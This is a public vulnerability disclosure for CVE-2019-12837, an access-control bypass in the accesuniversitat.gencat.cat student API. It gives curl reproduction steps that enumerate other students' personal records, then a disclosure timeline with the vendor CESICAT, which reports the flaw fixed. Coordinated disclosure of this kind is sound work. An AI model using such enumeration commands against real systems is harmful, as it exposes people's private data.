Page MenuHomeVulnz

Students can (still) see other student's personal information at accesuniversitat.gencat.cat
VerifiedPublic

Description

This is a more in-depth view of the vulnerability report T1, which seems like it wasn't properly solved, as the fix can be fairly easily bypassed.

Summary

Although there is a security check in place for some endpoints of the accesuniversitat.gencat.cat API, slightly modifying the endpoint URLs by adding a slash bypasses the security check.

Reproduction steps

  1. Open Chrome.
  2. Access https://accesuniversitat.gencat.cat/accesuniversitat/login.
  3. Open the Developer Tools and go to the Network tab.
  4. Sign in with a student account by entering the DNI and password of the account, and clicking Accedir.
  5. In the Developer Tools, open the last request made to the https://accesuniversitat.gencat.cat/accesuniversitat/accesuniversitat-rs/AppJava/api/v1/login/token API endpoint by clicking in its entry, and go to the Response tab. There, copy or take note of the token provided by the server.

As an example, the server will return something like {"token":"abcdef","hostName":"lt20stx2.cpd2.intranet.gencat.cat","activeSessions":1}, where abcdef is the token we're looking for.

  1. Open a terminal (make sure to have Curl installed) and execute the following commands (where {token} is the token which we retrieved in step 5):
    • curl --header "Authentication: Bearer {token}" https://accesuniversitat.gencat.cat/accesuniversitat/accesuniversitat-rs/AppJava/api/v1/estudiants/1218208/
    • curl --header "Authentication: Bearer {token}" https://accesuniversitat.gencat.cat/accesuniversitat/accesuniversitat-rs/AppJava/api/v1/estudiants/?page={page}, where {page} is the number of the page that you want to load (for instance, 1).
  1. The first command will retrieve information about the user specified in the request (in this case, 1218208) even if it is not the user who signed in. By changing the user id passed, the API returns information about another user. The second command will retrieve information about a subset of users (in the same manner as the first command but retrieving multiple users at once) in a paginated manner.

Attack vector

This vulnerability can be used to obtain programatically the personal and sensitive information of thousands of Catalan people who are registered in this gubernamental website. This includes their birthdays, home addresses, email addresses, DNIs, and phone numbers. Therefore, I think this vulnerability should be fixed as soon as possible.

Suggested resolution

In order to fix this vulnerability issue, the security check which already prevents requests like these without the last slash (for instance https://accesuniversitat.gencat.cat/accesuniversitat/accesuniversitat-rs/AppJava/api/v1/estudiants) should also be applied to requests which have a slash in the end.


This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Details

Vendor
CESICAT (Generalitat de Catalunya)
Product
Portal d'accés a la universitat
Reported
Jun 11 2019, 1:00 PM
Deadline
97
CVE
CVE-2019-12837

Event Timeline

avm99963 triaged this task as Priority-0 priority.Jun 10 2019, 3:18 AM
avm99963 created this task.

I emailed an AES-256 encrypted ZIP file with a translation of this report in Catalan on Jun 10, 3:18 AM and I just gave CESICAT the key via another contact method, so I'm setting this vulnerability as reported on Jun 11, 1:00 PM because this is when they first had access to the document.

avm99963 set Reported to Jun 11 2019, 1:00 PM.Jun 11 2019, 1:03 PM

I haven't updated this report for a long time, so this is the timeline of the most important events since CESICAT had access to the vulnerability details until now:

  • Jun 19, 2019, 12:01 AM: I sent them an email stating that in accesuniversitat.gencat.cat's version 1.7.6B002 the vulnerability seemed to be fixed, so I asked them whether it was completely fixed. Also, I stated that I requested a CVE, and I was assigned CVE-2019-12837. Finally, I also told them that when the vulnerability was fixed (and coming into an agreement within the 90 days period), I would like to coordinate with them the publication of the vulnerability details.
  • Then there were several fruitless emails (one sent by them and three sent by me).
  • Aug 23, 2019, 11:40 AM: CESICAT told me that they had been working and were still working in the original report. Also, they told me that they would contact me in a brief period of time to provide me with more information. Approx. 2 hours later I replied to them thanking them for their response and telling them that I was waiting for the update.
  • Sep 8, 2019, 2:24 PM: I sent them an email stating that the deadline was a day away (Sep 9), and so I would add 7 more days to the deadline so they could solve the problem in case it wasn't completely solved, and also to try to establish whether we would publish together the vulnerability details. I also stated that the new deadline would be Sep 16, but as @Douglasbot gives a grace period of one day and checks whether a report should be autopublished early in the morning, and this report was received by them at midday, it wouldn't be autopublished until Sep 18.

Therefore, I'm updating the deadline field to 97 instead of the original 90 days.

CESICAT sent me an email on Sep 13, 2019, 4:54 PM stating the following:

En relació amb la vostra notificació relativa a la incidència de seguretat esdevinguda a l’aplicació gestora del Portal d’Accés a la Universitat, us informem que el personal tècnic en va iniciar immediatament un procés de revisió tècnica de totes les seves funcionalitat i hi va detectar algunes incidències que ja han estat degudament solucionades.

Therefore, as I already verified some time ago that this was solved (and could also verify it right know in version 1.8.0), I'm changing this report status to verified.

Although my intention was to coordinate with them the disclosure of this report, they haven't shown any sign of wanting to coordinate it nor talk about a date for publication (although I've insisted several times in our email correspondence), so I will let this report be autopublished when the deadline is exceeded (which means it will be autopublished tomorrow early in the morning). I already warned them with sufficient time that if the deadline is exceeded the report will be autopublished, so I think this is the best way to publish it.

This is a PDF document with the entire email correspondence we've had:

And this is the original report which I sent them in the email correspondence (it is the same as this report, but translated to catalan):

Douglasbot changed the visibility from "Restricted Project (Project)" to "Public (No Login Required)".Sep 18 2019, 7:13 AM

The deadline has been exceeded -- automatically publishing vulnerability report.